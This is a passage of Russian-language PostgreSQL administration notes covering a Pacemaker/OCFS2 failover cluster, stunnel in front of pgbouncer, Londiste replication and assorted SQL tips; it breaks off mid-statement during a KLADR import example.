Ресурс, запускающий процессы СУБД PostgreSQL После необходимо настроить правила совместного расположения ресурсов и указать порядок запуска. В примере будет созданы ресурсы, обеспечивающие работу экземпляра СУБД. Ресурс, обеспечивающий монтирование ФС с БД Описание ресурса Pacemaker для ФС OCFS2 Ресурс fs-ocfs2 будет монтировать кластерную ФС OCFS2 в каталог /mnt/ocfs2clst на каждом узле. Монтирование будет производится по метке ФС. Том, где расположена БД, у меня имеет UUID метку ce92b1e7-30cb-4883-9a92-57c986f76acd (см. Создание ФС OCFS2). root~# mkdir -p /mnt/ocfs2clst # выполнить на каждом узле root@node1:~# crm conf crm(live/node1)configure# primitive fs-ocfs2 Filesystem \ params device="/dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd" \ directory="/mnt/ocfs2clst" \ fstype=ocfs2 options="rw,relatime,commit=5,coherency=buffered" \ op start timeout=60s interval=0 \ op stop timeout=60s interval=0 \ op monitor timeout=40 interval=20 Полный список параметров монтирования можно узнать на странице https://www.kernel.org/doc/html/latest/filesystems/ocfs2.html По-умолчанию, ресурс запускается только на одном узле, но так как у нас ФС кластерная, необходимо запустить ресурс на всех узлах. Это возможно с помощью клона ресурса: crm(live/node1)configure# clone fs-clone-ocfs2 fs-ocfs2 Проверяем конфигурацию и выходим: crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit После создания ресурса, ФС должна автоматически смонтироваться на всех узлах кластера. root@node1:~# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node3, node2 Правила размещения ресурса на узлах Если указан параметр symmetric-cluster=false, то для запуска ресурсов необходимо указать явные правила, где ресурсы могут запускаться. Указываем, что ресурс кластерной ФС должен запускаться на всех узлах кластера с равным приоритетом 1: root~# crm conf crm(live)configure# location loc-fs-ocfs2-1 fs-clone-ocfs2 1: node1 crm(live)configure# location loc-fs-ocfs2-2 fs-clone-ocfs2 1: node2 crm(live)configure# location loc-fs-ocfs2-3 fs-clone-ocfs2 1: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. Ресурс виртуального ip-адреса Создаём ресурс ip-pgclst виртуального ip-адреса 192.168.1.10. Именно этот ip-адрес будет использовать СУБД для приёма подключений. root~# crm conf crm(live)configure# primitive ip-pgclst IPaddr \ params ip=192.168.1.10 \ op monitor interval=10s Если в атрибутах кластера Pacemaker указан параметр symmetric-cluster=false, то аналогично ресурсу файловой системы создаём правила размещения. Ресурс ip-адреса будет располагаться совместно с СУБД. Если производительность узлов отличается, то можно указать разные приоритеты для запуска. Предположим, что node1 мощнее, чем node2, а node3 вообще исключим для работы СУБД: root~# crm conf crm(live)configure# location loc-ip-pgclst-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-pgclst-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-pgclst-3 ip-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. У меня в примере правила размещения не используются. Ресурс Pacemaker, запускающий процессы СУБД PostgreSQL Инициализация файлов кластера БД PostgreSQL Изменяем владельца и права доступа на каталог с БД: root# chown -R postgres:postgres /mnt/ocfs2clst root# chmod 750 /mnt/ocfs2clst Инициализируем файлы кластера БД PostgreSQL в каталоге /mnt/ocfs2clst/pg-data с включением контроля чётности страниц БД, а после запускаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/initdb -D /mnt/ocfs2clst/pg-data/ -A peer -k postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ start Настройка конфигурации PostgreSQL Подключаемся к СУБД через unix-сокет: root@node1:~# su - postgres postgres@node1:~$ psql Изменяем параметры БД для возможности работы под управлением Pacemaker: psql> alter system set logging_collector=on; psql> alter system lc_messages = 'C.UTF-8'; psql> alter system set listen_addresses='192.168.1.10'; Здесь я включил сборщик сообщений (logging collector), поменял язык сообщений на английский (при работе по Pacemaker, русские сообщения заменялись вопросами) и указал, что СУБД должна принимать соединения только на кластерном ip-адресе. Если потребуется в кластере Pacemaker запустить несколько экземпляров Postgresql, то необходимо разместить unix-сокет СУБД по отдельным каталогам, так как по-умолчанию все экземпляры будут создавать сокет в каталоге /tmp. psql> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-data'; Например, если бы у нас было две БД: СУБД 1, кластерный ip 192.168.1.21, каталог /mnt/ocfs2clst/pg-db1 СУБД 2, кластерный ip 192.168.1.22, каталог /mnt/ocfs2clst/pg-db2 то unix_socket_directories необходимо задать: psql db1> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db1'; psql db2> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db2; В дальнейшем для подключения через unix-сокет необходимо указать путь к нему (команду необходимо выполнять на том узле, где работает СУБД): postgres@node1:~$ psql -h /mnt/ocfs2clst/pg-data/ Редактируем файл /mnt/ocfs2clst/pg-data/pg_hba.conf, разрешаем подключение по сети с паролем: ... # IPv4 network connections host all all all md5 ... После внесения настроек, останавливаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ stop Создание ресурса СУБД PostgreSQL root~# crm configure crm(live/node1)configure# primitive db-pgclst pgsql \ params pgctl="/usr/lib/postgresql/13/bin/pg_ctl" \ psql="/usr/lib/postgresql/13/bin/psql" \ pgdba=postgres \ pglibs="/usr/lib/postgresql/13/lib" \ pgdata="/mnt/ocfs2clst/pg-data" \ socketdir="/mnt/ocfs2clst/pg-data" \ config="/mnt/ocfs2clst/pg-data/postgresql.conf" \ op start timeout=120s interval=0 \ op stop timeout=120s interval=0 \ op monitor timeout=30 interval=30 Значения параметра socketdir в описании ресурса Pacemaker должно совпадать с параметром unix_socket_directories в файле конфигурации PostgreSQL postgresql.conf/postgresql.auto.conf. Правила размещения ресурса на узлах Аналогично ресурсу ip-адреса, если в атрибутах указан параметр symmetric-cluster=false, то создаём правила размещения ресура: root~# crm conf crm(live)configure# location loc-db-pgclst-1 db-pgclst 100: node1 crm(live)configure# location loc-db-pgclst-2 db-pgclst 10: node2 crm(live)configure# location loc-db-pgclst-3 db-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно, тогда СУБД сможет запускаться на любом из узлов, при условии, что ресурсу ip-адреса так же разрешен запуск на всех узлах. У меня в примере правила размещения не используются. Правила, описывающие совместное расположение ресурсов Необходимо, чтобы виртуальный ip-адрес и экземпляра СУБД PostgreSQL располагались на одном узле, иначе СУБД не запустится. crm conf colocation <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответствующее правило: root~# crm conf crm(live/node1)configure# colocation col-ip-pgsql inf: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Правила, описывающие порядок запуска ресурсов Необходимо, чтобы ресурс виртуального ip-адреса и ресурс, монтирующий кластерную ФС OCFS2, запускались раньше ресурса СУБД PostgreSQL. crm conf order <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответсвующие правила: root~# crm conf crm(live/node1)configure# order ord-fs-pgsql Mandatory: fs-clone-ocfs2 db-pgclst crm(live/node1)configure# order ord-ip-pgsql Mandatory: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Проверка работы После настройки ресурсов проверяем, что все они запущены с помощью команды crm_mon: root@node1:~# crm_mon -nr1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Sat Jul 16 18:04:00 2022 * Last change: Sat Jul 16 10:52:30 2022 by root via cibadmin on node2 * 3 nodes configured * 8 resource instances configured Node List: * Node node1: online: * Resources: * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * sh-dummy (stonith:null): Started * Node node2: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * db-pgclst (ocf::heartbeat:pgsql): Started * ip-pgclst (ocf::heartbeat:IPaddr): Started * Node node3: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started Inactive Resources: * No inactive resources Из вывода видно, что СУБД запущена на узле node2. Подключимся к нему через ssh и создадим пользователя в Postgresql: user@pc:~$ ssh user@192.168.1.12 user@node2:~$ sudo su - postgres postgres@node2:~$ psql -h /mnt/ocfs2clst/pg-data/ postgres=# create role pguser login encrypted password 'пароль'; postgres=# \q Проверяем подключение к СУБД с клиента: user@pc:~$ psql -h 192.168.1.10 -U pguser postgres postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) С любого узла кластера перемещаем СУБД на другой узел: root@node1:~# crm_resource --move -r db-pgclst -H node1 или с помощью CRM Shell root@node1:~# crm resource move db-pgclst node1 Определяем где запущен ресурс: root@node1:~# crm_resource -W -r db-pgclst resource db-pgclst is running on: node1 Выполняем повторный запрос с клиента: postgres=> select count(*) from pg_settings; FATAL: terminating connection due to administrator command сервер неожиданно закрыл соединение Скорее всего сервер прекратил работу из-за сбоя до или в процессе выполнения запроса. Подключение к серверу потеряно. Попытка восстановления удачна. psql (14.1, сервер 13.7 (Debian 13.7-0+deb11u1)) postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) Как видно, при перемещении ресурса все соединения с СУБД закрылись, но повторный sql-запрос выполнился успешно. Команды перемещения ресуров crm_resource --move или crm resource move на самом делее создают в базе Pacemaker CIB запись: <rsc_location id="cli-prefer-db-pgclst" rsc="db-pgclst" role="Started" node="node1" score="INFINITY"/> Эта запись указывает в дальнейшем запускать ресурс db-pgclst на узле node1. Для того чтобы вернуть возможность запуска ресурса на любом из узлов достаточно выполнить одну из команд: root# crm_resource -r db-pgclst --clear root# crm resource clear db-pgclst Команды управления кластером Pacemaker root# crm_verify -L -V - проверка конфигурации Pacemaker root# crm_mon -rf - отслеживание статуса ресурсов root# crm_resource -W -r db-pgclst - определить расположение ресурса db-pgclst в кластере root# crm node standby - приостановить работу узла root# crm node online - возобновить работу узла root# crm resource status - посмотреть список ресурсов root# crm resource move db-pgclst node2 - мигрировать ресурс ip-pgclst на узел node2 root# crm resource clear db-pgclst - убрать привязку после переноса root# crm resource stop db-pgclst - остановить ресурс db-pgclst root# crm resource start db-pgclst - запустить работу ресурса db-pgclst root# crm resource cleanup db-pgclst или # crm_resource --resource db-pgclst --cleanup - сброс количества ошибок ресурса root# crm configure delete db-pgclst - удаление ресурса root# cibadmin --query > tmp.xml - создать дамп базы Pacemaker CIB

Добавление поддержки SSL в pgbouncer при помощи stunnel Автор: umask [комментарии]

Для быстрого старта pgbouncer c поддержкой SSL можно использовать вот такой конфигурационный файл stunnel: ### stunnel config for ssl-before-pgbouncer ### Quick way to create stunnel.pem: ### cd /etc/stunnel ### openssl req -new -x509 -days 77777 -nodes -out stunnel.pem -keyout stunnel.pem ### openssl gendh 2048 >> stunnel.pem ### openssl x509 -subject -dates -fingerprint -in stunnel.pem cert = /etc/stunnel/stunnel.pem foreground = yes setgid = nobody setuid = nobody pid = /tmp/stunnel.pid compression = zlib ### use this level to prevent trashing logs #debug = 4 [psqlssl] ### stunnel will listen here accept = 127.0.0.1:9933 ### pgbouncer listen here connect = 127.0.0.1:5433 protocol = pgsql Версия stunnel должна быть не ниже 4.27, так как только начиная с данной версии есть поддержка protocol = pgsql. Основная необходимость в SSL в моём случае - сжатие, а не шифрование.

Установка Londiste, системы асинхронной мастер-слэйв репликации PostgreSQL (доп. ссылка 1) Автор: Sergey Konoplev [комментарии]

Инструкция содержит подробное пошаговое описание процесса настройки репликации на основе Londiste, системы асинхронной мастер-слэйв репликации из пакета SkyTools от Skype. Допустим есть 2 сервера - host1 и host2. На host1 работает кластер с одной или несколькими базами, которые необходимо реплицировать на host2. Другими словами host1 будет мастером, а host2 слейвом. Прежде всего необходимо установить пакет SkyTools. Его исходники можно найти на официальном сайте проекта http://developer.skype.com/SkypeGarage/DbProjects/SkyTools или в wiki http://wiki.postgresql.org/wiki/Skytools . Там же найдёте всю документацию и ссылки на дополнительные материалы. Советую обращаться к ним если захотите узнать дополнительные подробности о вещах, которых я буду в данной статье касаться поверхностно. Итак, всё ПО необходимое для репликации установлено, но, прежде чем начать настройку, хочу рассказать о принципах работы Londiste в очень общих словах. Londiste базируется на механизме очередей PgQ, который тоже входит в пакет SkyTools. Информация об изменениях данных попадает в эти очереди из спец-триггеров, навешиваемых на реплицируемые таблицы. PgQ, в свою очередь, основывается на пакетной обработке и использует так называемый ticker, утилиту (демон), генерирующую события готовности пачек данных. Эти события слушает демон Londiste и по их наступлению переносит пачки с мастера на слейв. Репликация на базе Londiste может работать по схеме - один мастер на несколько слейвов. В связи с этим я буду делать пометки, различающие установку репликации первого слейва и последующих. Также я буду различать репликацию отдельной базы и кластера целиком. Описанный процесс не требует даунтайма. Замечание: В данном описании будут часто встречаются обобщения более узких ситуаций, которые не тестировались во всех возможных вариантах. Так что прежде чем внедрять её в продакшн, тщательно протестируйте ваш процесс. Если вы найдёте какую-нибудь ошибку или не рабочую ситуацию, буду благодарен если сообщите. 1. Первым делом подготовим мастер-сервер 1.1. Права на мастере В данном примере все утилиты будут работать под системным пользователем postgres. Операции с БД я доверю также пользователю postgres (который в базе). Но в реальности будет правильнее сделать отдельного пользователя для этих утилит, смотрите по вашей ситуации. Дадим пользователю postgres доверительный доступ (без пароля) к базам на мастере со слейва. /var/lib/postgres/8.4/data/pg_hba.conf: ... # TYPE DATABASE USER CIDR-ADDRESS METHOD # host2 IP host db1 postgres 192.168.10.2/32 trust .. . Если реплицируются конкретные базы, а не весь комплект, то добавьте такие записи для каждой из них. В случае же репликации всех БД достаточно одной записи, где в колонке DATABASE указываем all. Не забудьте сделать reload серверу. 1.2. Настрока ticker-а Далее создадим файл конфигурации ticker-а. /etc/skytools/db1-ticker.ini: [pgqadm] job_name = db1-ticker db = dbname=db1 # Задержка между запусками обслуживания (ротация очередей и т.п.) в секундах maint_delay = 600 # Задержка между проверками наличия активности (новых пакетов данных) в секундах loop_delay = 0.1 logfile = /var/log/skytools/%(job_name)s.log pidfile = /var/run/skytools/%(job_name)s.pid Создайте подобные конфигурации для каждой реплицируемой базы. 1.3. Запускаем ticker Теперь необходимо инсталлировать служебный код (SQL) и запустить ticker как демона для каждой из баз. Делается это с помощью утилиты pgqadm.py следующими командами: python pgqadm.py /etc/skytools/db1-ticker.ini install python pgqadm.py /etc/skytools/db1-ticker.ini ticker -d Проверим, что в логах (/var/log/skytools/db1-tickers.log) всё нормально. На данном этапе там должны быть редкие записи (раз в минуту). 2. Далее настроим слейв 2.1. Убедимся что Londiste остановлен python londiste.py -s /etc/skytools/db1-londiste.ini Повторите для всех реплицируемых баз. 2.2. Востанавливаем схему базы Замечание: В данном примере подразумевается что целевая система не содержит баз с такими же именами как у реплицируемых. Если реплицируются отдельные базы, то прежде всего необходимо создать пользователей, идентичных тем, которые работали с ними на мастере. Далее переносим схемы этих баз на слейв (повторяем для каждой): pg_dump -s -C -h host1 -U postgres db1 | psql -U postgres 1>db1-restore.stdout 2>db2-restore.stderr Если реплицируем все базы целиком, то достаточно один раз сделать так: pg_dumpall -s -h host1 -U postgres | psql -U postgres 1>all-restore.stdout 2>all-restore.stderr Убедимся, что в лог-файлах *-restore.stderr отсутствуют ошибки кроме "роль postgres уже существует" (ч.г. не могу понять для чего вообще pg_dumpall дампит эту роль). 2.3. Создаём конфигурацию репликатора Для каждой из реплицируемых баз создадим конфигурационные файлы: /etc/skytools/db1-londiste.ini: [londiste] job_name = db1-londiste provider_db = dbname=db1 port=5432 host=host1 subscriber_db = dbname=db1 # Это будет использоваться в качестве SQL-идентификатора, т.ч. не используйте # точки и пробелы. # ВАЖНО! Если есть живая репликация на другой слейв, именуем очередь так-же pgq_queue_name = db1-londiste-queue logfile = /var/log/skytools/%(job_name)s.log pidfile = /var/run/skytools/%(job_name)s.pid log_size = 5242880 log_count = 3 2.4. Устанавливаем Londiste в базы на мастере и слейве Теперь необходимо установить служебный SQL для каждой из созданных в предыдущем пункте конфигураций. Устанавливаем код на стороне мастера: python londiste.py /etc/skytools/db1-londiste.ini provider install и подобным образом на стороне слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber install После этого пункта на мастере будут созданы очереди для репликации. 2.5. Запускаем процессы Londiste Для каждой реплицируемой базы делаем: python londiste.py /etc/skytools/db1-londiste.ini replay -d Таким образом запустятся слушатели очередей репликации, но, т.к. мы ещё не указывали какие таблицы хотим реплицировать, они пока будут работать в холостую. Убедимся что в логах нет ошибок (/var/log/skytools/db1-londistes.log). 2.6. Добавляем реплицируемые таблицы Для каждой конфигурации указываем что будем реплицировать с мастера: python londiste.py /etc/skytools/db1-londiste.ini provider add --all и что со слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber add --all В данном примере я использую спец-параметр --all, который означает все таблицы, но вместо него вы можете перечислить список конкретных таблиц, если не хотите реплицировать все. 2.7. Добавляем реплицируемые последовательности (sequence) Так же для всех конфигураций. Для мастера: python londiste.py /etc/skytools/db1-londiste.ini provider add-seq --all Замечание: В версиях SkyTools до 2.1.9 включительно была обнаружена ошибка при добавлением последовательностей на мастере используя параметр --all, т.ч. если у вас такая версия используйте следующий хак: for seq in $( psql -t -A -U postgres toozla -c "\ds" | awk -F '|' '{ if ($1 != "pgq" && $1 != "londiste") { print $1"."$2 } }'); do python londiste.py /etc/skytools/db1-londiste.ini provider add-seq $seq; done Для слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber add-seq --all Точно также как и с таблицами можно указать конкретные последовательности вместо --all. 2.8. Проверка Итак, всё что надо сделано. Теперь Londiste запустит так называемый bulk copy процесс, который массово (с помощью COPY) зальёт присутствующие на момент добавления таблиц данные на слейв, а затем перейдёт в состояние обычной репликации. Мониторим логи на предмет ошибок: less /var/log/skytools/db1-londiste.log Если всё хорошо, смотрим состояние репликации. Данные уже синхронизированы для тех таблиц, где статус отображается как "ok". python londiste.py /etc/skytools/db1-londiste.ini subscriber tables Table State public.table1 ok public.table2 ok public.table3 in-copy public.table4 - public.table5 - public.table6 - ... Для удобства представляю следующий трюк с уведомление в почту об окончании первоначального копирования (мыло поменять на своё ;): ( while [ $( python londiste.py /etc/skytools/db1-londiste.ini subscriber tables | tail -n+2 | awk '{print $2}' | grep -v ok | wc -l) -ne 0 ]; do sleep 60; done; echo '' | mail -s 'Replication done EOM' user@domain.com ) & Ссылки на публикации, которые мне помогли в написании этой статьи: SkyTools - PostgreSQL Wiki http://wiki.postgresql.org/wiki/Skytools SkyTools - Skype Developer Zone https://developer.skype.com/SkypeGarage/DbProjects/SkyTools PostgreSQL master slave(s) asynchronous replication - tail -f /dev/dim http://tapoueh.org/skytools.html

Определение размеров объектов БД в PostgreSQL (доп. ссылка 1) Автор: Konstantin A Mironov [комментарии]

Размер БД: select pg_database_size('имя базы'); Размер таблицы БД: select select pg_relation_size('имя таблицы'); Полный размер таблицы с индексами: select pg_total_relation_size('имя таблицы'); Размер столбца: select pg_column_size('имя стобца') from 'имя таблицы'; Состояние всех настроек: select pg_show_all_settings();

Решение проблем с наличием в MySQL записей с битой кодировкой [обсудить]

Способ перекодирования выборочных записей в MySQL, содержащих данные в битой кодировке. Перекодирование ошибочно добавленных нескольких записей с UTF-8 текстом в таблицу в которой данные находятся в кодировке cp1251 (DEFAULT CHARSET cp1251). UPDATE table SET column=CONVERT(CONVERT(CONVERT(column USING binary) USING utf8) USING cp1251) WHERE id=123; Сокращенный вариант, внешний CONVERT можно убрать, MySQL знает, что данные в таблице в cp1251: UPDATE table SET column=CONVERT(CONVERT(column USING binary) USING utf8) WHERE id=123;

Как добиться, чтобы в запросах LIKE 'что%' использовался индекс ? (доп. ссылка 1) Автор: Олег Бартунов [комментарии]

Из-за сложности и многообразия locale в постгресе запрещено использовать индекс для запросов вида LIKE 'что%' для всех locale кроме 'C'. А что делать если хочется ? В 8.01 стало возможным использовать operator class [1] ! Мы будем использовать varchar_pattern_ops, B-tree индекс в этом случае, будет строиться без использования collation правил из locale, а на основе сравнения буквы с буквой. test=# \d ru_words w | text | Indexes: "w_idx" btree (lower(w) varchar_pattern_ops) test=# create index w_idx on ru_words (lower(w) varchar_pattern_ops); CREATE INDEX test=# vacuum analyze test; test=# explain analyze select w from ru_words where lower(w) like 'что%'; Index Scan using w_idx on ru_words... Index Cond: ((lower(w) ~>=~ 'что'::character varying) AND (lower(w) ~<~ 'чтп'::character varying)) Filter: (lower(w) ~~ 'что%'::text)

Функции для преобразования unix timestamp в Pg timestamp для PostgreSQL (доп. ссылка 1) Автор: Олег Бартунов [обсудить]

SELECT TIMESTAMP WITH TIME ZONE 'epoch' + 1109796233 * INTERVAL '1 second'; CREATE OR REPLACE FUNCTION ts2int(timestamp without time zone) RETURNS int AS $$ select extract('epoch' from $1)::integer; $$ LANGUAGE SQL STRICT STABLE; CREATE OR REPLACE FUNCTION int2ts(integer) RETURNS timestamp AS $$ SELECT ( TIMESTAMP WITH TIME ZONE 'epoch' + $1 * INTERVAL '1second')::timestamp without time zone; $$ LANGUAGE SQL STRICT STABLE;

Полнотекстовый поиск в PostgreSQL (Tsearch2) (доп. ссылка 1) [комментарии]

ALTER TABLE companies ADD COLUMN fti_business tsvector; UPDATE companies SET fti_business = to_tsvector('default',business_model); VACUUM FULL ANALYZE companies; CREATE INDEX idx_fti_business ON companies USING gist(fti_business); CREATE TRIGGER tg_fti_companies BEFORE UPDATE OR INSERT ON companies FOR EACH ROW EXECUTE PROCEDURE tsearch2(fti_business, business_model); SELECT company_name, business_model FROM companies WHERE fti_business @@ to_tsquery('default','bushing | engine');

Как реализовать "COPY table TO stdout" на perl используя модуль Pg. [обсудить]

Для просмотра всего содержимого таблицы оптимальнее использовать COPY TO, вместо SELECT. $conn->exec('COPY table (in, out) TO stdout'); die $conn->errorMessage if($conn->errorMessage); $conn->getline($cur_line, 512); while ($cur_line ne '\\.'){ my ($in, $out) = split(/\t/, $cur_line); .... $conn->getline($cur_line, 512); } $conn->endcopy;

Как реализовать "COPY table FROM stdin" на perl используя модуль Pg. [обсудить]

COPY FROM вместо INSERT позволяет значительно оптимизировать помещение данных в базу. $conn->exec('COPY traffic (src_ip, dst_ip, in_octets, out_octets) FROM stdin;'); die $conn->errorMessage if($conn->errorMessage); while(...) { $conn->putline("$src\t$dst\t$in\t$out\n"); } $conn->putline("\\.\n"); $conn->endcopy;

Как через SELECT запрос в PostgreSQL посмотреть структуру таблицы. [обсудить]

SELECT a.attname, format_type(a.atttypid, a.atttypmod), a.attnotnull, a.atthasdef, a.attnum FROM pg_class c, pg_attribute a WHERE c.relname ='имя таблицы' AND a.attnum > 0 AND a.attrelid = c.oid ORDER BY a.attnum;

Как поменять или установить пароль для пользователя в PostgreSQL [комментарии]

ALTER USER имя_пользователя WITH ENCRYPTED PASSWORD 'пароль'; В pg_hba.conf в качестве метода аутентификации должен использоваться md5.

Как выполнить в PostgreSQL запрос вида "pivot table" и использовать условие при выводе данных. (доп. ссылка 1) [обсудить]

Если значение поля vendor = 1,2 или 3 суммируем только значения sales для этих номеров. SELECT product, SUM(CASE vendor WHEN 1 THEN sales ELSE 0 END) AS "pink ", SUM(CASE vendor WHEN 2 THEN sales ELSE 0 END) AS "brown", SUM(CASE vendor WHEN 3 THEN sales ELSE 0 END) AS "green", SUM(sales) AS "sum of sales" FROM sales GROUP BY product; Если необходимо сделать выборку по промежутку, то нужно использовать: CASE WHEN vendor > 1 AND vendor < 5 THEN sales ELSE 0 END

Как добавить комментарии к таблицам в PostgreSQL [обсудить]

COMMENT ON test IS 'Это тестовая таблица.'; COMMENT ON DATABASE test IS 'Тестовая БД'; COMMENT ON INDEX test_index IS 'Индекс тестовой базы по id'; COMMENT ON COLUMN test.id IS 'Ключевое поле';

Как в Shell выполнить SQL запрос или получить список баз и таблиц (PostgreSQL) [комментарии]

Список баз: psql -A -q -t -c "select datname from pg_database" template1 | grep -v '^template1$' Список таблиц в базе db_name : echo '\d'| psql -A -q -t db_name |cut -d'|' -f1

Как включить автоматическую проверку значений в PostgreSQL [обсудить]

Для запрещения нулевых значений в поле id в CREATE TABLE: CONSTRAINT "test_tab_id" CHECK (id > 0) Или если таблица уже существует: ALTER TABLE test_tab ADD CONSTRAINT "test_tab_id" CHECK (id > 0);

Как посмотреть в PostgreSQL размер таблиц на диске и число записей в них [обсудить]

SELECT relname, relpages*8192, reltuples FROM pg_class WHERE NOT relname LIKE 'pg_%' ORDER BY relpages DESC;

Как сопоставить в PostgreSQL цифровые имена файлов и директорий с символьными именами таблиц и баз. [обсудить]

Сопоставление имен директорий с названиями баз: select oid,datname from pg_database; Сопоставление имен таблиц в текущей базе к именам файлов: select relname, relfilenode from pg_class;

Как получить уникальный системный номер записи в PostgreSQL [обсудить]

Поле с именем OID всегда содержит уникальный номер записи. select oid from table;

маленькая заметка к возрастающим ключам Автор: Yuri A. Kabaenkov [обсудить]

в последних версиях pgsql существует тип данных serial которой автоматически создает последовательность. тоесть CREATE TABLE test ( a serial );

Как осуществить автоматическую проверку новых данных в PostgreSQL [обсудить]

CREATE RULE table_id_update AS ON UPDATE TO table WHERE OLD.id != NEW.id DO INSTEAD NOTHING;

Как организовать таблицу с подробной историей всех изменений в PostgreSQL [комментарии]

CREATE RULE table_update AS ON UPDATE TO table DO INSERT INTO table_log ( id, titile, contents, pguser, date_modified ) VALUES ( OLD.id, OLD.title, OLD.description, getpgusername(), 'now'::text );

Преобразование дат (сек. с 1970 и timestamp) в PostgreSQL [комментарии]

Из еpoch в timestamp: 'epoch'::timestamptz + '$epoch_time sec'::interval или $epoch_time::int4::abstime::timestamptz или timestamptz 'epoch' + '$epoch_time second' Из timestamp в epoch: date_part('epoch', timestamp_field)

Как создать индекс в PostgreSQL [обсудить]

Создадим индекс для двух полей login и price в таблице item. При использовании операций больше или меньше нужно использовать btree индексы, hash для операций '='. Несколько полей для индексирования можно указывать только для btree. Например: CREATE UNIQUE INDEX "index_item" on "item" using btree ( "login" "varchar_ops", "price" "integer_ops"); CREATE INDEX "index_item2" on "item" using hash ( "login" );

Как автоматически генерировать возрастающие ключи [обсудить]

CREATE SEQUENCE next_item start 1 increment 1 maxvalue 2147483647 minvalue 1 cache 1; или CREATE SEQUENCE next_item; CREATE TABLE item ( "id" integer DEFAULT nextval('next_item') PRIMARY KEY, ..... );

Как ограничить число элементов выдаваемых SELECT в PostgreSQL [комментарии]

Использовать директиву "LIMIT сколько_записей_выводить OFFSET с_какой_записи_начинать_вывод": Например, вывести 10 записей удовлетворяющих запросу, начиная с 50: SELECT * FROM table LIMIT 10 OFFSET 50;

Импорт КЛАДР в базу данных PostgreSQL Автор: Легостаев Вениамин [комментарии]

Конвертация КЛАДР (классификатор адресов России) в формат sqlite. Скачиваем КЛАДР с официального сайта wget http://www.gnivc.ru/html/gnivcsoft/KLADR/Base.7z Устанавливаем архиватор 7z sudo yum install p7zip Распаковываем архив 7za e Base.7z Устанавливаем sqlite sudo yum install sqlite Устанавливаем sqlite3-dbf sudo yum install sqlite3-dbf Запускаем sqlite3 sqlite3 my_kladr.db В sqlite загружаем модуль libspatialite .load libspatialite.so.2 Импорт данных из КЛАДР в sqlite CREATE VIRTUAL TABLE virt_street_tbl USING VirtualDbf('/home/developer/kladr/STREET.DBF', 'CP866'); CREATE VIRTUAL TABLE virt_socrbase_tbl USING VirtualDbf('/home/developer/kladr/SOCRBASE.DBF', 'CP866'); CREATE VIRTUAL TABLE virt_kladr_tbl USING VirtualDbf('/home/developer/kladr/KLADR.DBF', 'CP866'); CREATE VIRTUAL TABLE virt_flat_tbl USING VirtualDbf('/home/developer/kladr/FLAT.DBF', 'CP866'); CREATE VIRTUAL TABLE virt_doma_tbl USING VirtualDbf('/home/developer/kladr/DOMA.DBF', 'CP866'); CREATE VIRTUAL TABLE virt_altnames_tbl USING VirtualDbf('/home/developer/kladr/ALTNAMES.DBF', 'CP866'); create table street_tbl as select * from virt_street_tbl; create table socrbase_tbl as select * from virt_socrbase_tbl; create table kladr_tbl as select * from virt_kladr_tbl; create table flat_tbl as select * from virt_flat_tbl; create table doma_tbl as select * from virt_doma_tbl; create table altnames_tbl as select * from virt_altnames_tbl; drop table virt_street_tbl; drop table virt_socrbase_tbl; drop table virt_kladr_tbl; drop table virt_flat_tbl; drop table virt_doma_tbl; drop table virt_altnames_tbl; Выходим из sqlite .exit Результат: файл my_kladr.db содержит КЛАДР в формате sqlite. Подключение файла my_kladr.db к базе данных PostgreSQL Скачиваем модуль sqlite_fdw wget https://github.com/gleu/sqlite_fdw/archive/master.zip Устанавливаем unzip sudo yum install unzip Распаковываем архив unzip master Заходим в каталог sqlite_fdw-master cd sqlite_fdw-master Устанавливаем модуль sudo PATH=/usr/pgsql-9.3/bin/:$PATH make USE_PGXS=1 install Входим в систему из-под пользователя postgres sudo su - postgres Входим в postgresql psql Выбираем базу данных \\c YouDatabase Создаем расширение CREATE EXTENSION sqlite_fdw; Создаем сервер CREATE SERVER sqlite_kladr_server FOREIGN DATA WRAPPER sqlite_fdw OPTIONS (database 'path_to_my_kladr.db'); Создаем схему create schema kladr; Создаем внешние таблицы CREATE FOREIGN TABLE kladr.street_tbl( id bigint, name varchar, type varchar, code varchar, c2 varchar, c3 varchar, c4 varchar, c5 varchar) SERVER sqlite_kladr_server OPTIONS (table 'street_tbl'); CREATE FOREIGN TABLE kladr.socrbase_tbl( id bigint, id1 bigint, short_name varchar, full_name varchar, id3 bigint) SERVER sqlite_kladr_server OPTIONS (table 'socrbase_tbl'); CREATE FOREIGN TABLE kladr.kladr_tbl( id bigint, name varchar, type varchar, code 